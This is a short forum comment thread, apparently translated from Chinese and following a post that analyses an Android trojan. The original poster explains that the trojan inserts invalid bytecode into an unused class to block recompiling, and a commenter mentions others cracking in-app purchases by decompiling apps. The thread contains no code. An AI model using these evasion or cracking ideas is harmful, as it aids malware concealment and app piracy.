358463121 posted on 2014-8-8 20:19
william2568 posted on 2014-8-8 20:19
A question: sometimes I run into the problem mentioned in the post, where an APK can be decompiled but cannot be recompiled. How should that be solved?
gzrheheyixiao posted on 2014-8-8 20:19
Witnessed the birth of another expert!
laoxing posted on 2014-8-8 20:24
Thanks for your hard work, OP
 OP | h_one posted on 2014-8-8 22:57
amscracker posted on 2014-8-8 20:08
An expert is an expert, worshipping!

Let's learn from each other
 OP | h_one posted on 2014-8-8 22:58
358463121 posted on 2014-8-8 20:19
It seems today's phone viruses all need root

Why? This one doesn't.
 OP | h_one posted on 2014-8-8 23:01
william2568 posted on 2014-8-8 20:19
A question: sometimes I run into the problem mentioned in the post, where an APK can be decompiled but cannot be recompiled. How should that be solved?

There are many different cases. The technique this trojan uses is inserting invalid bytecode into an unused class; I haven't worked that one out yet.
william2568 posted on 2014-8-9 08:27
zxcfvasd posted on 2014-8-8 23:01
There are many different cases. The technique this trojan uses is inserting invalid bytecode into an unused class; I haven't worked that one out yet.

Thanks for the answer
Sometimes other people decompile an app, crack the in-app purchase, then recompile it, and the whole process goes smoothly
I decompile the same apk successfully, but the recompile fails
If invalid bytes had been inserted, I shouldn't be the only one failing...
The error message on failure is also exactly as the article says, exception in thread "main"... and so on
Having written all this, I hope an expert can give some guidance
Sorry for the trouble, and thanks again!